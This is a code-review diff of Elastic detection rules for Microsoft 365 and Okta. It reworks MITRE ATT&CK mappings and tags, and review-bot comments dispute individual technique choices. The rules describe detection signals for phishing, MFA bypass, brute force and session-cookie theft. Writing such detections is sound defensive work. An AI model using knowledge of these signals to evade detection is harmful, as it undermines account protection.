@@ -133,31 +141,29 @@ event.dataset: "o365.audit" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1528" -name = "Steal Application Access Token" -reference = "https://attack.mitre.org/techniques/T1528/" +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" -[rule.threat.tactic] -id = "TA0006" -name = "Credential Access" -reference = "https://attack.mitre.org/tactics/TA0006/" - -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1566" name = "Phishing" reference = "https://attack.mitre.org/techniques/T1566/" - [[rule.threat.technique.subtechnique]] id = "T1566.002" name = "Spearphishing Link" reference = "https://attack.mitre.org/techniques/T1566/002/" + + [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" + diff --git a/rules/integrations/o365/initial_access_identity_unusual_sso_errors_for_user.toml b/rules/integrations/o365/initial_access_identity_unusual_sso_errors_for_user.toml index 6066dad1266..bf11a1e50c2 100644 --- a/rules/integrations/o365/initial_access_identity_unusual_sso_errors_for_user.toml +++ b/rules/integrations/o365/initial_access_identity_unusual_sso_errors_for_user.toml @@ -2,7 +2,7 @@ creation_date = "2021/05/17" integration = ["o365"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/04" [rule] author = ["Elastic", "Austin Songer"] 
@@ -75,7 +75,15 @@ references = [ risk_score = 47 rule_id = "2de10e77-c144-4e69-afb7-344e7127abd0" severity = "medium" -tags = ["Domain: Identity", "Tactic: Credential Access", "Data Source: Microsoft 365", "Data Source: Microsoft 365 Audit Logs", "Use Case: Identity and Access Audit", "Use Case: Threat Detection", "Resources: Investigation Guide"] +tags = [ + "Domain: Identity", + "Data Source: Microsoft 365", + "Data Source: Microsoft 365 Audit Logs", + "Use Case: Identity and Access Audit", + "Use Case: Threat Detection", + "Tactic: Initial Access", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "new_terms" @@ -95,21 +103,27 @@ event.dataset:o365.audit [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" + [[rule.threat.technique]] -id = "T1606" -name = "Forge Web Credentials" -reference = "https://attack.mitre.org/techniques/T1606/" +id = "T1566" +name = "Phishing" +reference = "https://attack.mitre.org/techniques/T1566/" -[[rule.threat.technique.subtechnique]] -id = "T1606.002" -name = "SAML Tokens" -reference = "https://attack.mitre.org/techniques/T1606/002/" [rule.threat.tactic] -id = "TA0006" -name = "Credential Access" -reference = "https://attack.mitre.org/tactics/TA0006/" +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" + [rule.new_terms] field = "new_terms_fields" value = ["o365.audit.UserId", "o365.audit.ErrorNumber"] diff --git a/rules/integrations/o365/initial_access_security_compliance_user_reported_phish_malware.toml b/rules/integrations/o365/initial_access_security_compliance_user_reported_phish_malware.toml index 1515f163b1b..f460f945f23 100644 
--- a/rules/integrations/o365/initial_access_security_compliance_user_reported_phish_malware.toml +++ b/rules/integrations/o365/initial_access_security_compliance_user_reported_phish_malware.toml @@ -2,7 +2,7 @@ creation_date = "2022/01/12" integration = ["o365"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/04" [rule] author = ["Elastic"] @@ -74,13 +74,24 @@ event.dataset:o365.audit and event.provider:SecurityComplianceCenter and event.a [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1566" name = "Phishing" reference = "https://attack.mitre.org/techniques/T1566/" +[[rule.threat.technique.subtechnique]] +id = "T1566.001" +name = "Spearphishing Attachment" +reference = "https://attack.mitre.org/techniques/T1566/001/" + +[[rule.threat.technique.subtechnique]] +id = "T1566.002" +name = "Spearphishing Link" +reference = "https://attack.mitre.org/techniques/T1566/002/" + + [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" + diff --git a/rules/integrations/o365/initial_access_security_compliance_user_restricted_from_sending_email.toml b/rules/integrations/o365/initial_access_security_compliance_user_restricted_from_sending_email.toml index 3caea118249..15f54581589 100644 --- a/rules/integrations/o365/initial_access_security_compliance_user_restricted_from_sending_email.toml +++ b/rules/integrations/o365/initial_access_security_compliance_user_restricted_from_sending_email.toml @@ -2,7 +2,7 @@ creation_date = "2021/07/15" integration = ["o365"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/04" [rule] author = ["Austin Songer"] @@ -77,3 +77,11 @@ event.dataset:o365.audit and event.provider:SecurityComplianceCenter and event.c ''' +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0040" +name = "Impact" +reference = "https://attack.mitre.org/tactics/TA0040/" + 
diff --git a/rules/integrations/o365/lateral_movement_onedrive_malware_uploaded.toml b/rules/integrations/o365/lateral_movement_onedrive_malware_uploaded.toml index 7f4d3ef8c88..29d2607f6cb 100644 --- a/rules/integrations/o365/lateral_movement_onedrive_malware_uploaded.toml +++ b/rules/integrations/o365/lateral_movement_onedrive_malware_uploaded.toml @@ -2,7 +2,7 @@ creation_date = "2022/01/10" integration = ["o365"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/25" [rule] author = ["Elastic"] @@ -75,13 +75,30 @@ event.dataset:o365.audit and event.provider:OneDrive and event.code:SharePointFi [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1080" name = "Taint Shared Content" reference = "https://attack.mitre.org/techniques/T1080/" + [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1608" +name = "Stage Capabilities" +reference = "https://attack.mitre.org/techniques/T1608/" +[[rule.threat.technique.subtechnique]] +id = "T1608.001" +name = "Upload Malware" +reference = "https://attack.mitre.org/techniques/T1608/001/" + + +[rule.threat.tactic] +id = "TA0042" +name = "Resource Development" +reference = "https://attack.mitre.org/tactics/TA0042/" + diff --git a/rules/integrations/o365/lateral_movement_sharepoint_malware_uploaded.toml b/rules/integrations/o365/lateral_movement_sharepoint_malware_uploaded.toml index 8045ac1ec6b..68a66be6744 100644 --- a/rules/integrations/o365/lateral_movement_sharepoint_malware_uploaded.toml +++ b/rules/integrations/o365/lateral_movement_sharepoint_malware_uploaded.toml @@ -2,7 +2,7 @@ creation_date = "2022/01/10" integration = ["o365"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/25" [rule] author = ["Elastic"] 
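Review bot: The new TA0042 Resource Development / T1608.001 (Upload Malware) block in the OneDrive malware-uploaded rule applies a pre-compromise tactic to a detection that fires on the victim tenant's own audit log; T1608 describes an adversary staging malware on infrastructure it controls, whereas malware landing in a target's OneDrive is what the existing T1080 Taint Shared Content entry under Lateral Movement already covers. The SharePoint malware-uploaded hunk on the next line adds the identical block. If the entry is kept, both files still need `"Tactic: Resource Development"` in `tags`, since neither file's diff touches the tags line.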
@@ -74,13 +74,30 @@ event.dataset:o365.audit and event.provider:SharePoint and event.code:SharePoint
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
 id = "T1080"
 name = "Taint Shared Content"
 reference = "https://attack.mitre.org/techniques/T1080/"
+
 [rule.threat.tactic]
 id = "TA0008"
 name = "Lateral Movement"
 reference = "https://attack.mitre.org/tactics/TA0008/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+[[rule.threat.technique]]
+id = "T1608"
+name = "Stage Capabilities"
+reference = "https://attack.mitre.org/techniques/T1608/"
+[[rule.threat.technique.subtechnique]]
+id = "T1608.001"
+name = "Upload Malware"
+reference = "https://attack.mitre.org/techniques/T1608/001/"
+
+
+[rule.threat.tactic]
+id = "TA0042"
+name = "Resource Development"
+reference = "https://attack.mitre.org/tactics/TA0042/"
+
diff --git a/rules/integrations/o365/persistence_entra_id_global_administrator_role_assign.toml b/rules/integrations/o365/persistence_entra_id_global_administrator_role_assign.toml
index 7320db56d55..1768e604eac 100644
--- a/rules/integrations/o365/persistence_entra_id_global_administrator_role_assign.toml
+++ b/rules/integrations/o365/persistence_entra_id_global_administrator_role_assign.toml
@@ -2,7 +2,7 @@
 creation_date = "2022/01/06"
 integration = ["o365"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/12/10"
 [rule]
 author = ["Elastic"]
@@ -59,7 +59,16 @@ references = [
 risk_score = 47
 rule_id = "88671231-6626-4e1b-abb7-6e361a171fbb"
 severity = "medium"
-tags = ["Domain: Cloud", "Domain: SaaS", "Domain: Identity", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Microsoft 365", "Data Source: Microsoft 365 Audit Logs", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"]
+tags = [
+ "Domain: Cloud",
+ "Domain: SaaS",
+ "Domain: Identity",
+ "Data Source: Microsoft 365",
+ "Data Source: Microsoft 365 Audit Logs",
+ "Use Case: Identity and Access Audit",
+ "Tactic: Persistence",
+ "Resources: Investigation Guide",
+]
 timestamp_override = "event.ingested"
 type = "query"
@@ -78,36 +87,19 @@ event.dataset:o365.audit
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
 id = "T1098"
 name = "Account Manipulation"
 reference = "https://attack.mitre.org/techniques/T1098/"
-
 [[rule.threat.technique.subtechnique]]
 id = "T1098.003"
 name = "Additional Cloud Roles"
 reference = "https://attack.mitre.org/techniques/T1098/003/"
+
+
 [rule.threat.tactic]
 id = "TA0003"
 name = "Persistence"
 reference = "https://attack.mitre.org/tactics/TA0003/"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[[rule.threat.technique]]
-id = "T1098"
-name = "Account Manipulation"
-reference = "https://attack.mitre.org/techniques/T1098/"
-
-[[rule.threat.technique.subtechnique]]
-id = "T1098.003"
-name = "Additional Cloud Roles"
-reference = "https://attack.mitre.org/techniques/T1098/003/"
-
-[rule.threat.tactic]
-id = "TA0004"
-name = "Privilege Escalation"
-reference = "https://attack.mitre.org/tactics/TA0004/"
diff --git a/rules/integrations/o365/persistence_exchange_management_role_assignment.toml b/rules/integrations/o365/persistence_exchange_management_role_assignment.toml
index dc8eced2b23..3618f364ed9 100644
--- a/rules/integrations/o365/persistence_exchange_management_role_assignment.toml
+++ b/rules/integrations/o365/persistence_exchange_management_role_assignment.toml
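Review bot: This hunk deletes the `TA0004` Privilege Escalation entry (and the tags hunk above drops its `Tactic: Privilege Escalation` tag) from a rule that fires on Global Administrator role assignment, leaving only Persistence. ATT&CK lists `T1098.003` Additional Cloud Roles under both Persistence and Privilege Escalation, and obtaining Global Administrator is the textbook privilege-escalation outcome in Entra ID, so if one tactic per technique is the goal, Privilege Escalation is arguably the one to keep. The SharePoint site-collection-admin rule later in this patch keeps both entries for the same sub-technique, while this rule, the Exchange management-role rule and the mailbox-delegation rule drop one; whichever convention is intended should be applied consistently.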
@@ -2,7 +2,7 @@
 creation_date = "2020/11/20"
 integration = ["o365"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/12/10"
 [rule]
 author = ["Elastic"]
@@ -67,7 +67,13 @@ references = [
 risk_score = 47
 rule_id = "98995807-5b09-4e37-8a54-5cae5dc932d7"
 severity = "medium"
-tags = ["Domain: Cloud", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Microsoft 365", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"]
+tags = [
+ "Domain: Cloud",
+ "Data Source: Microsoft 365",
+ "Use Case: Identity and Access Audit",
+ "Tactic: Persistence",
+ "Resources: Investigation Guide",
+]
 timestamp_override = "event.ingested"
 type = "query"
@@ -78,36 +84,18 @@ event.dataset:o365.audit and event.provider:Exchange and event.category:web and
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
 id = "T1098"
 name = "Account Manipulation"
 reference = "https://attack.mitre.org/techniques/T1098/"
-
 [[rule.threat.technique.subtechnique]]
 id = "T1098.003"
 name = "Additional Cloud Roles"
 reference = "https://attack.mitre.org/techniques/T1098/003/"
+
 [rule.threat.tactic]
 id = "TA0003"
 name = "Persistence"
 reference = "https://attack.mitre.org/tactics/TA0003/"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[[rule.threat.technique]]
-id = "T1098"
-name = "Account Manipulation"
-reference = "https://attack.mitre.org/techniques/T1098/"
-
-[[rule.threat.technique.subtechnique]]
-id = "T1098.003"
-name = "Additional Cloud Roles"
-reference = "https://attack.mitre.org/techniques/T1098/003/"
-
-[rule.threat.tactic]
-id = "TA0004"
-name = "Privilege Escalation"
-reference = "https://attack.mitre.org/tactics/TA0004/"
diff --git a/rules/integrations/o365/persistence_exchange_suspicious_mailbox_permission_delegation.toml b/rules/integrations/o365/persistence_exchange_suspicious_mailbox_permission_delegation.toml
index 5432108c661..71b93df4cac 100644
--- a/rules/integrations/o365/persistence_exchange_suspicious_mailbox_permission_delegation.toml
+++ b/rules/integrations/o365/persistence_exchange_suspicious_mailbox_permission_delegation.toml
@@ -2,7 +2,7 @@
 creation_date = "2021/05/17"
 integration = ["o365"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/12/10"
 [rule]
 author = ["Elastic", "Austin Songer"]
@@ -73,7 +73,16 @@ references = [
 risk_score = 21
 rule_id = "0ce6487d-8069-4888-9ddd-61b52490cebc"
 severity = "low"
-tags = ["Domain: Cloud", "Domain: SaaS", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Microsoft 365", "Data Source: Microsoft Exchange", "Data Source: Microsoft 365 Audit Logs", "Use Case: Configuration Audit", "Resources: Investigation Guide"]
+tags = [
+ "Domain: Cloud",
+ "Domain: SaaS",
+ "Data Source: Microsoft 365",
+ "Data Source: Microsoft Exchange",
+ "Data Source: Microsoft 365 Audit Logs",
+ "Use Case: Configuration Audit",
+ "Tactic: Persistence",
+ "Resources: Investigation Guide"
+]
 timestamp_override = "event.ingested"
 type = "new_terms"
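Review bot: The rewritten `tags` array ends with `"Resources: Investigation Guide"` followed by `]` without the trailing comma that the other multi-line `tags` arrays in this patch carry (`"Resources: Investigation Guide",`). TOML accepts both forms, but the inconsistency will churn the next time a formatter or the rule-normalisation tooling touches these files; the same omission appears in the Okta multiple-user-agent rule further down.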
@@ -107,39 +116,22 @@ field_names = [
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
 id = "T1098"
 name = "Account Manipulation"
 reference = "https://attack.mitre.org/techniques/T1098/"
-
 [[rule.threat.technique.subtechnique]]
 id = "T1098.002"
 name = "Additional Email Delegate Permissions"
 reference = "https://attack.mitre.org/techniques/T1098/002/"
+
+
 [rule.threat.tactic]
 id = "TA0003"
 name = "Persistence"
 reference = "https://attack.mitre.org/tactics/TA0003/"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[[rule.threat.technique]]
-id = "T1098"
-name = "Account Manipulation"
-reference = "https://attack.mitre.org/techniques/T1098/"
-
-[[rule.threat.technique.subtechnique]]
-id = "T1098.002"
-name = "Additional Email Delegate Permissions"
-reference = "https://attack.mitre.org/techniques/T1098/002/"
-
-[rule.threat.tactic]
-id = "TA0004"
-name = "Privilege Escalation"
-reference = "https://attack.mitre.org/tactics/TA0004/"
 [rule.new_terms]
 field = "new_terms_fields"
 value = ["o365.audit.UserId"]
diff --git a/rules/integrations/o365/privilege_escalation_exchange_new_or_modified_federation_domain.toml b/rules/integrations/o365/privilege_escalation_exchange_new_or_modified_federation_domain.toml
index c3a951755b8..6b821fb7bfe 100644
--- a/rules/integrations/o365/privilege_escalation_exchange_new_or_modified_federation_domain.toml
+++ b/rules/integrations/o365/privilege_escalation_exchange_new_or_modified_federation_domain.toml
@@ -2,7 +2,7 @@
 creation_date = "2021/05/17"
 integration = ["o365"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/12/10"
 [rule]
 author = ["Austin Songer"]
@@ -64,7 +64,13 @@ references = [
 risk_score = 21
 rule_id = "684554fc-0777-47ce-8c9b-3d01f198d7f8"
 severity = "low"
-tags = ["Domain: Cloud", "Tactic: Defense Evasion", "Tactic: Persistence", "Data Source: Microsoft 365", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"]
+tags = [
+ "Domain: Cloud",
+ "Data Source: Microsoft 365",
+ "Use Case: Identity and Access Audit",
+ "Tactic: Privilege Escalation",
+ "Resources: Investigation Guide",
+]
 timestamp_override = "event.ingested"
 type = "query"
@@ -77,46 +83,19 @@ event.outcome:success
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
 id = "T1484"
 name = "Domain or Tenant Policy Modification"
 reference = "https://attack.mitre.org/techniques/T1484/"
-
 [[rule.threat.technique.subtechnique]]
 id = "T1484.002"
 name = "Trust Modification"
 reference = "https://attack.mitre.org/techniques/T1484/002/"
-[[rule.threat.technique]]
-id = "T1556"
-name = "Modify Authentication Process"
-reference = "https://attack.mitre.org/techniques/T1556/"
-[[rule.threat.technique.subtechnique]]
-id = "T1556.007"
-name = "Hybrid Identity"
-reference = "https://attack.mitre.org/techniques/T1556/007/"
 [rule.threat.tactic]
-id = "TA0005"
-name = "Defense Evasion"
-reference = "https://attack.mitre.org/tactics/TA0005/"
+id = "TA0004"
+name = "Privilege Escalation"
+reference = "https://attack.mitre.org/tactics/TA0004/"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[[rule.threat.technique]]
-id = "T1556"
-name = "Modify Authentication Process"
-reference = "https://attack.mitre.org/techniques/T1556/"
-
-[[rule.threat.technique.subtechnique]]
-id = "T1556.007"
-name = "Hybrid Identity"
-reference = "https://attack.mitre.org/techniques/T1556/007/"
-
-[rule.threat.tactic]
-id = "TA0003"
-name = "Persistence"
-reference = "https://attack.mitre.org/tactics/TA0003/"
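Review bot: The rewrite removes `T1556.007` Hybrid Identity and the whole `TA0003` Persistence entry, leaving `T1484.002` Trust Modification under Privilege Escalation. A new or modified federated domain is the classic way to plant a long-lived authentication backdoor (an attacker-controlled IdP or signing key the tenant now trusts), so losing the Persistence mapping understates what the rule catches; ATT&CK does not list `T1484` under Persistence, so keeping Persistence means keeping the `T1556.007` entry. If the intent is one tactic per rule to match the `privilege_escalation_` filename, say so in the description, since the preceding hunk's tag change from Defense Evasion/Persistence to Privilege Escalation alone will otherwise read as a coverage regression.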
diff --git a/rules/integrations/o365/privilege_escalation_sharepoint_site_collection_admin_added.toml b/rules/integrations/o365/privilege_escalation_sharepoint_site_collection_admin_added.toml
index 8d34ebf4f65..e354d1a2bfa 100644
--- a/rules/integrations/o365/privilege_escalation_sharepoint_site_collection_admin_added.toml
+++ b/rules/integrations/o365/privilege_escalation_sharepoint_site_collection_admin_added.toml
@@ -2,7 +2,7 @@
 creation_date = "2026/03/02"
 integration = ["o365"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2026/03/02"
 [rule]
 author = ["Elastic", "Austin Songer"]
@@ -87,36 +87,34 @@ event.dataset:o365.audit
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
 id = "T1098"
 name = "Account Manipulation"
 reference = "https://attack.mitre.org/techniques/T1098/"
-
 [[rule.threat.technique.subtechnique]]
 id = "T1098.003"
 name = "Additional Cloud Roles"
 reference = "https://attack.mitre.org/techniques/T1098/003/"
+
 [rule.threat.tactic]
-id = "TA0003"
-name = "Persistence"
-reference = "https://attack.mitre.org/tactics/TA0003/"
+id = "TA0004"
+name = "Privilege Escalation"
+reference = "https://attack.mitre.org/tactics/TA0004/"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
 id = "T1098"
 name = "Account Manipulation"
 reference = "https://attack.mitre.org/techniques/T1098/"
-
 [[rule.threat.technique.subtechnique]]
 id = "T1098.003"
 name = "Additional Cloud Roles"
 reference = "https://attack.mitre.org/techniques/T1098/003/"
+
 [rule.threat.tactic]
-id = "TA0004"
-name = "Privilege Escalation"
-reference = "https://attack.mitre.org/tactics/TA0004/"
+id = "TA0003"
+name = "Persistence"
+reference = "https://attack.mitre.org/tactics/TA0003/"
diff --git a/rules/integrations/okta/credential_access_attempted_bypass_of_okta_mfa.toml b/rules/integrations/okta/credential_access_attempted_bypass_of_okta_mfa.toml
index a138eaf5c54..a7c2689ef36 100644
--- a/rules/integrations/okta/credential_access_attempted_bypass_of_okta_mfa.toml
+++ b/rules/integrations/okta/credential_access_attempted_bypass_of_okta_mfa.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/05/21"
 integration = ["okta"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/07/02"
 [rule]
 author = ["Elastic"]
@@ -65,7 +65,12 @@ references = [
 risk_score = 73
 rule_id = "3805c3dc-f82c-4f8d-891e-63c24d3102b0"
 severity = "high"
-tags = ["Tactic: Credential Access", "Tactic: Defense Evasion", "Data Source: Okta", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"]
+tags = [
+ "Data Source: Okta",
+ "Use Case: Identity and Access Audit",
+ "Tactic: Credential Access",
+ "Resources: Investigation Guide",
+]
 timestamp_override = "event.ingested"
 type = "query"
@@ -76,36 +81,14 @@ event.dataset:okta.system and event.action:user.mfa.attempt_bypass
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
-id = "T1556"
-name = "Modify Authentication Process"
-reference = "https://attack.mitre.org/techniques/T1556/"
+id = "T1111"
+name = "Multi-Factor Authentication Interception"
+reference = "https://attack.mitre.org/techniques/T1111/"
-[[rule.threat.technique.subtechnique]]
-id = "T1556.006"
-name = "Multi-Factor Authentication"
-reference = "https://attack.mitre.org/techniques/T1556/006/"
 [rule.threat.tactic]
 id = "TA0006"
 name = "Credential Access"
 reference = "https://attack.mitre.org/tactics/TA0006/"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[[rule.threat.technique]]
-id = "T1556"
-name = "Modify Authentication Process"
-reference = "https://attack.mitre.org/techniques/T1556/"
-
-[[rule.threat.technique.subtechnique]]
-id = "T1556.006"
-name = "Multi-Factor Authentication"
-reference = "https://attack.mitre.org/techniques/T1556/006/"
-
-[rule.threat.tactic]
-id = "TA0005"
-name = "Defense Evasion"
-reference = "https://attack.mitre.org/tactics/TA0005/"
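Review bot: `T1111` Multi-Factor Authentication Interception describes capturing MFA codes or tokens (SIM swap, keyloggers, intercepted OTPs), whereas the event this rule keys on, `user.mfa.attempt_bypass`, records an attempt to skip a factor rather than a captured one. The removed `T1556.006` under Credential Access already gave a single-tactic mapping, so if the goal was only to drop the duplicated Defense Evasion entry, `T1556.006` could have stayed; if `T1111` is deliberate, add a sentence to the rule description tying the Okta event to interception so the mapping is defensible.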
diff --git a/rules/integrations/okta/credential_access_attempts_to_brute_force_okta_user_account.toml b/rules/integrations/okta/credential_access_attempts_to_brute_force_okta_user_account.toml
index fb5b188fca0..0c7a8ec869e 100644
--- a/rules/integrations/okta/credential_access_attempts_to_brute_force_okta_user_account.toml
+++ b/rules/integrations/okta/credential_access_attempts_to_brute_force_okta_user_account.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/08/19"
 integration = ["okta"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/07/02"
 [rule]
 author = ["Elastic", "@BenB196", "Austin Songer"]
@@ -79,21 +79,17 @@ event.dataset:okta.system and event.action:user.account.lock
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
 id = "T1110"
 name = "Brute Force"
 reference = "https://attack.mitre.org/techniques/T1110/"
-[[rule.threat.technique.subtechnique]]
-id = "T1110.001"
-name = "Password Guessing"
-reference = "https://attack.mitre.org/techniques/T1110/001/"
 [rule.threat.tactic]
 id = "TA0006"
 name = "Credential Access"
 reference = "https://attack.mitre.org/tactics/TA0006/"
+
 [rule.threshold]
 field = ["okta.actor.alternate_id"]
 value = 3
diff --git a/rules/integrations/okta/credential_access_multiple_auth_events_from_single_device_behind_proxy.toml b/rules/integrations/okta/credential_access_multiple_auth_events_from_single_device_behind_proxy.toml
index 607e0c6f2f3..032c715eb49 100644
--- a/rules/integrations/okta/credential_access_multiple_auth_events_from_single_device_behind_proxy.toml
+++ b/rules/integrations/okta/credential_access_multiple_auth_events_from_single_device_behind_proxy.toml
@@ -2,7 +2,7 @@
 creation_date = "2023/11/10"
 integration = ["okta"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/09/08"
 [rule]
 author = ["Elastic"]
@@ -92,16 +92,32 @@ event.dataset:okta.system
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+[[rule.threat.technique]]
+id = "T1110"
+name = "Brute Force"
+reference = "https://attack.mitre.org/techniques/T1110/"
+[[rule.threat.technique.subtechnique]]
+id = "T1110.003"
+name = "Password Spraying"
+reference = "https://attack.mitre.org/techniques/T1110/003/"
+
 [[rule.threat.technique]]
 id = "T1110"
 name = "Brute Force"
 reference = "https://attack.mitre.org/techniques/T1110/"
+[[rule.threat.technique.subtechnique]]
+id = "T1110.004"
+name = "Credential Stuffing"
+reference = "https://attack.mitre.org/techniques/T1110/004/"
+
+
 [rule.threat.tactic]
 id = "TA0006"
 name = "Credential Access"
 reference = "https://attack.mitre.org/tactics/TA0006/"
+
 [rule.threshold]
 field = ["okta.debug_context.debug_data.dt_hash"]
 value = 1
diff --git a/rules/integrations/okta/credential_access_multiple_device_token_hashes_for_single_okta_session.toml b/rules/integrations/okta/credential_access_multiple_device_token_hashes_for_single_okta_session.toml
index f68c3fed768..03486d8b6ad 100644
--- a/rules/integrations/okta/credential_access_multiple_device_token_hashes_for_single_okta_session.toml
+++ b/rules/integrations/okta/credential_access_multiple_device_token_hashes_for_single_okta_session.toml
@@ -2,7 +2,7 @@
 creation_date = "2023/11/08"
 integration = ["okta"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/09/25"
 [rule]
 author = ["Elastic"]
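Review bot: After this hunk `T1110` appears twice as separate `[[rule.threat.technique]]` tables, one per sub-technique, whereas the T1566 hunk at the top of this patch nests both sub-techniques under a single technique table. Pick one convention; nesting `T1110.003` and `T1110.004` under one `[[rule.threat.technique]]` avoids a duplicated technique id in the rule's threat array and in any ATT&CK coverage export built from it, and matches the shape the T1566 hunk uses.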
@@ -66,7 +66,13 @@ setup = """## Setup
 The Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule."""
 severity = "medium"
-tags = ["Use Case: Identity and Access Audit", "Tactic: Credential Access", "Tactic: Defense Evasion", "Data Source: Okta", "Domain: SaaS", "Resources: Investigation Guide"]
+tags = [
+ "Use Case: Identity and Access Audit",
+ "Data Source: Okta",
+ "Tactic: Credential Access",
+ "Domain: SaaS",
+ "Resources: Investigation Guide",
+]
 timestamp_override = "event.ingested"
 type = "esql"
@@ -101,31 +107,14 @@ from logs-okta*
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
 id = "T1539"
 name = "Steal Web Session Cookie"
 reference = "https://attack.mitre.org/techniques/T1539/"
+
 [rule.threat.tactic]
 id = "TA0006"
 name = "Credential Access"
 reference = "https://attack.mitre.org/tactics/TA0006/"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[[rule.threat.technique]]
-id = "T1550"
-name = "Use Alternate Authentication Material"
-reference = "https://attack.mitre.org/techniques/T1550/"
-
-[[rule.threat.technique.subtechnique]]
-id = "T1550.004"
-name = "Web Session Cookie"
-reference = "https://attack.mitre.org/techniques/T1550/004/"
-
-[rule.threat.tactic]
-id = "TA0005"
-name = "Defense Evasion"
-reference = "https://attack.mitre.org/tactics/TA0005/"
diff --git a/rules/integrations/okta/credential_access_multiple_user_agent_os_authentication.toml b/rules/integrations/okta/credential_access_multiple_user_agent_os_authentication.toml
index aaf6412175c..208243ef930 100644
--- a/rules/integrations/okta/credential_access_multiple_user_agent_os_authentication.toml
+++ b/rules/integrations/okta/credential_access_multiple_user_agent_os_authentication.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/10/22"
 integration = ["okta"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/10/22"
 [rule]
 author = ["Elastic"]
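Review bot: Dropping the `T1550.004` Web Session Cookie entry leaves this rule mapped only to `T1539` Steal Web Session Cookie, but, judging by the rule name, the ES|QL logic observes one Okta session presenting several device token hashes, i.e. a stolen session being used from another device, which is `T1550.004`; the theft itself is not something Okta system logs can show. The AiTM session-cookie-replay rule later in this patch keeps `T1550.004` under `TA0008` Lateral Movement next to its new `T1539` entry, and the same pairing would fit here better than a bare `T1539`.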
@@ -55,7 +55,14 @@ same dt_hash. This will help identify the nature of the anomaly.
 risk_score = 73
 rule_id = "fb3ca230-af4e-11f0-900d-f661ea17fbcc"
 severity = "high"
-tags = ["Domain: Identity", "Tactic: Defense Evasion", "Data Source: Okta", "Data Source: Okta System Logs", "Use Case: Threat Detection", "Resources: Investigation Guide"]
+tags = [
+ "Domain: Identity",
+ "Data Source: Okta",
+ "Data Source: Okta System Logs",
+ "Use Case: Threat Detection",
+ "Tactic: Credential Access",
+ "Resources: Investigation Guide"
+]
 timestamp_override = "event.ingested"
 type = "threshold"
@@ -72,21 +79,17 @@ data_stream.dataset: "okta.system"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
-id = "T1550"
-name = "Use Alternate Authentication Material"
-reference = "https://attack.mitre.org/techniques/T1550/"
+id = "T1539"
